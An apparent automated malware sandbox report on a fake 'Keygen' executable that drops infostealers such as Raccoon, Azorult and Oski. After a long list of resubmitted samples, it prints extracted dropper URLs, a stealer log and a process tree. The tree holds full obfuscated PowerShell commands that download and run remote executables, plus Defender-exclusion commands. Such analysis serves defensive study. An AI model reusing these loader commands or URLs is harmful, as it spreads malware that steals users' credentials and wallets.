Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    79s
  • max time network
    157s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (127) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.01 - 23:29:23 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (863 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 3 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (127) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (127) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3936
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\27E1.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (127) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1304
      • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:3032
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\27E1.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2236
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:196
          • C:\Users\Public\svp.exe
            "C:\Users\Public\svp.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5000
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:5112
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4248
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4248 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\049741328183964\\* & exit
                  8⤵
                    PID:4744
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4248
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2632
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:3412
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4316
              • C:\Users\Public\svp.exe
                "C:\Users\Public\svp.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4236
                • C:\Users\Admin\AppData\Local\Temp\bOdPECtxR2.exe
                  "C:\Users\Admin\AppData\Local\Temp\bOdPECtxR2.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4540
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\bOdPECtxR2.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4572
                • C:\Users\Admin\AppData\Local\Temp\m8Gmw1DwxY.exe
                  "C:\Users\Admin\AppData\Local\Temp\m8Gmw1DwxY.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:732
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:5568
                  • C:\Users\Admin\AppData\Local\Temp\hqHDIXswBx.exe
                    "C:\Users\Admin\AppData\Local\Temp\hqHDIXswBx.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:4452
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\wajymyq5.inf
                      8⤵
                        PID:2172
                    • C:\Users\Admin\AppData\Local\Temp\KXbXKRNNE0.exe
                      "C:\Users\Admin\AppData\Local\Temp\KXbXKRNNE0.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1224
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4416
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\svp.exe"
                      7⤵
                        PID:4104
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:4824
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\27E1.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2688
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2308
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:2824
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\27E1.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3976
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
